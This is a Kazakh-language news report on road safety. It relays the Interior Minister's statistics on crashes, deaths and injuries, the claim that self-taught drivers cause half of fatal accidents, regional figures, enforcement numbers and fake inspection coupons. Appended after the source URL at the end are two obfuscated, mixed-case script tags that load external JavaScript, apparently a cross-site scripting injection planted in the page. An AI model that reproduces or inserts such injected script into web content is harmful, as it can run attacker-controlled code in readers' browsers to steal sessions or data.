Автомектепте оқымай, көлік айдауды «өз бетінше үйренгендер» адам өліміне алып келетін ЖКО-ның 50%-на жауапты - ҚР ІІМ ҚР Премьер-Министрі Әлихан Смайылов Үкімет отырысында жол қозғалысы қауіпсіздігін қамтамасыз ету жөніндегі шараларды күшейтуді тапсырды. Ішкі істер министрі Марат Ахметханов жыл басынан бері елімізде апаттар бойынша барлық көрсеткіштердің өскенін айтты: ЖКО (9 429), қаза тапқандар (1 478) және жараланғандар (12 394) саны артты. Бұл орайда талдау автомектепте оқымай, көлік айдауды «өз бетінше үйренгендер» адам өліміне алып келетін ЖКО-ның 50%-на жауапты екенін көрсетіп отыр. Алматы қаласында, Алматы, Жамбыл және Түркістан облыстарында жолдар аса қауіпті. Аталған өңірлерге Қазақстан бойынша барлық ЖКО-ның 56%-ы, жарақат алғандардың 55%-ы және қаза тапқандардың 41%-ы тиесілі. Жалпы есепті кезеңде полиция 4,5 млн-ға жуық жол қозғалысы ережелерін бұзу фактісінің жолын кесті, 17,5 мыңнан астам мас жүргізуші ұсталды, 20 мың жүргізуші көлік басқару құқығынан айырылды. Министр техникалық тексеру орталықтарын ашуға қойылатын талаптар төмендегеннен кейін тексеруден өту туралы жалған талондар беріле бастағанын атап өтті. Мәселен, 106 мың жүргізуші техникалық регламенттердің талаптарына сай келмейтін көлікті басқарғаны үшін жауапқа тартылды, тағы 80 мың жүргізушіге жалпы техникалық тексеруден өтпегені үшін айыппұл салынды. https://ortcom.kz/kk/novosti/1664864747<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>